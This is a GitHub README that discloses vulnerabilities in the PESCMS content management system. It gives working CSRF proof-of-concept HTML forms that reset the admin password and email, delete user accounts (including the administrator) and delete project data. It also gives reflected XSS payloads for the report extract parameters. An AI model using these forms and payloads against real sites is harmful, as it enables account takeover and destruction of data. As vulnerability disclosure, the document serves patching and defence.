Skip to content

RO6OTXX/pescms_vulnerability

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

pescms_vulnerability

Cross Site Request Forgery(CSRF)-1

modify admin's password ,mail,phone and head-image.

Technical Description: file : pescms/App/Team/PUT/User.php

The function of this file is to Modify personal information,but it don't Verify whether the operation is legal. Through it attackers can modify admin's password ,mail,phone and head-image.

Proof of Concept(PoC)

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=User&a=setting" method="POST">
      <input type="hidden" name="method" value="PUT" />
      <input type="hidden" name="name" value="admin" />
      <input type="hidden" name="mail" value="123456&#64;qq&#46;com" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="password" value="newadmin" />
      <input type="hidden" name="home" value="Team&#45;Index&#45;index" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

image1

Success.And the password of admin has been modify.
image2

Cross Site Request Forgery(CSRF)-2

Delete the administrator and other member's account number

Technical Description: file:

pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php  

Throught it can delete Any member and administrator just by modify the 'id' that in Url. Delete the Account number of administrator just need to modify the id as '1'.
image3

Proof of Concept(PoC)

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=User&a=action&id=36&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVVzZXImYT1pbmRleA==" method="POST">
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Visit this page of poc:
image4
image5

We refresh the list of user ,that find that the user that called light is deleted.
image6

Cross Site Request Forgery(CSRF)-3

Delete import information

Technical Description: file:

pescms/App/Team/DELETE/Attachment.php
pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php
pescms/App/Team/DELETE/Model.php
pescms/App/Team/DELETE/Notice.php

Through CSRF to Delete important data is exist in these files.

ALL the delete operations are not verify in front page. Like this:
image7

Proof of Concept(PoC)

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=Project&a=action&id=1&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVByb2plY3QmYT1pbmRleA==" method="POST">
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

image8 refresh:
image9

And other operations of delete are exist on this cms. Just give the positions,don't prove.
image10
image11

Reflected XSS in App/Team/GET/Repoort.php

In the method of extract, the CSRF also exist , but this is to prove the Rdflected XSS,not CSRF.

In line 72-78 , the data from $_GET('begin') and $_GET('end') is transfer to variables, and output in pages.
image12

Proof of Concept(PoC)

localhost/pescms/Public/?g=Team&m=Report&a=extract&begin="onmouseover=alert(1)//&end=&user=0
or 
localhost/pescms/Public/?g=Team&m=Report&a=extract&begin=&end="onmouseover=alert(1)//&user=0
or,page:
http://localhost/pescms/Public/?g=Team&m=Report&a=allExtract&begin="onmouseover=alert(1)//&end=&user=0  

image13

In this page ,Reflected XSS can be combined with CSRF,this will cause bigger destruction

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published